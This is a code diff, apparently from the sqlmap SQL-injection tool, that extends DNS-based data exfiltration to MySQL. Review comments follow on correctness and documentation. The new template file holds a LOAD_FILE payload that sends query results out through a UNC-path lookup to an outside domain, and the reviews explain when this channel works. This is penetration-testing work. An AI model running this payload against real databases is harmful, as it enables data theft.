diff --git a/lib/request/dns.py b/lib/request/dns.py index 0fdf6a8aa..d1c931f5b 100644 --- a/lib/request/dns.py +++ b/lib/request/dns.py @@ -95,6 +95,7 @@ class DNSServer: thread.start() if __name__ == "__main__": + server = None try: server = DNSServer() server.run() @@ -118,4 +119,6 @@ if __name__ == "__main__": except KeyboardInterrupt: os._exit(0) finally: - server._running = False + if server: + server._running = False + diff --git a/lib/techniques/dns/use.py b/lib/techniques/dns/use.py index 64bb08970..cffad47bf 100644 --- a/lib/techniques/dns/use.py +++ b/lib/techniques/dns/use.py @@ -52,7 +52,7 @@ def dnsUse(payload, expression): count = 0 offset = 1 - if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE): + if conf.dnsDomain and Backend.getIdentifiedDbms() in (DBMS.MSSQL, DBMS.ORACLE, DBMS.MYSQL): output = hashDBRetrieve(expression, checkConf=True) if output and PARTIAL_VALUE_MARKER in output or kb.dnsTest is None: @@ -64,7 +64,7 @@ def dnsUse(payload, expression): while True: count += 1 prefix, suffix = ("%s" % randomStr(3) for _ in xrange(2)) - chunk_length = MAX_DNS_LABEL / 2 if Backend.isDbms(DBMS.ORACLE) else MAX_DNS_LABEL / 4 - 2 + chunk_length = MAX_DNS_LABEL / 2 if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.MYSQL) else MAX_DNS_LABEL / 4 - 2 _, _, _, _, _, _, fieldToCastStr, _ = agent.getFields(expression) nulledCastedField = agent.nullAndCastField(fieldToCastStr) nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, chunk_length) diff --git a/procs/mysql/dns_request.txt b/procs/mysql/dns_request.txt new file mode 100644 index 000000000..051cd276f --- /dev/null +++ b/procs/mysql/dns_request.txt @@ -0,0 +1 @@ +SELECT LOAD_FILE(CONCAT('\\\\%PREFIX%.',(%QUERY%),'.%SUFFIX%.%DOMAIN%\\%PREFIX%%SUFFIX%')) \ No newline at end of file
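Review bot: The new `if server:` guard in the finally block tests the truthiness of a DNSServer instance, while the value it is actually distinguishing is the `None` sentinel assigned before the try; `if server is not None:` states that intent and cannot be defeated by a later `__len__`/`__bool__` on the class. Note also that the `except KeyboardInterrupt: os._exit(0)` branch just above terminates without unwinding, so this finally block never runs on Ctrl-C; the guard only matters when constructing or running the server raises something else, which is worth a one-line comment such as `# finally is skipped on the os._exit() path above; this covers failures before/inside run()`. The `if __name__ == "__main__":` block begins outside this hunk.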
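Review bot: Enabling DBMS.MYSQL in this guard turns on a channel that, judging by the new procs/mysql/dns_request.txt in the same commit, depends on LOAD_FILE() resolving a UNC hostname, which only happens when the MySQL server runs on Windows and the session holds the FILE privilege; the condition checks neither. The `kb.dnsTest` probe referenced two lines below presumably catches a dead channel, but a reader of this line cannot tell that, so either narrow the MySQL case to a Windows fingerprint if the OS fingerprint is available in this module (hedged — no OS symbol is visible in the hunk), or add `# MySQL DNS exfiltration needs a Windows-hosted server with FILE privilege (UNC path in LOAD_FILE)` above the condition. dnsUse's body continues outside this hunk.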
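Review bot: The conditional now encodes two DBMS-specific label budgets (`MAX_DNS_LABEL / 2` for Oracle and MySQL, `MAX_DNS_LABEL / 4 - 2` otherwise) with nothing explaining where the ratios come from, and the lines that presumably hex-encode the chunk are not in this hunk, so the link is easy to lose. A comment such as `# the chunk is hex-encoded before it becomes a DNS label (63 chars max); MSSQL's hex output is roughly 4x plus a "0x" prefix` would make the budgets reviewable — confirm the encoding against the dns_request templates before wording it as fact. Since `xrange` on the line above pins this file to Python 2, `/` is integer division here; if the module is ever ported, these become floats and need `//`. dnsUse's body starts and ends outside this hunk.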
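Review bot: This template exfiltrates through the host part of a UNC path, `\\<prefix>.<chunk>.<suffix>.<domain>\<prefix><suffix>`, so it only triggers a lookup on a Windows-hosted MySQL whose session has the FILE privilege, and LOAD_FILE() returns NULL rather than erroring otherwise — a silent failure mode that is not recorded anywhere in the commit and belongs in the commit message or the DNS-technique documentation for MySQL. The literal also relies on backslash-escape processing: under `sql_mode=NO_BACKSLASH_ESCAPES` the `\\\\` and `\\` sequences are kept verbatim, which changes the path shape; whether the resolver is still reached in that case, and whether name resolution happens before the `secure_file_priv` path check, are both worth verifying on the supported server versions. The "No newline at end of file" marker is harmless for a single-line template.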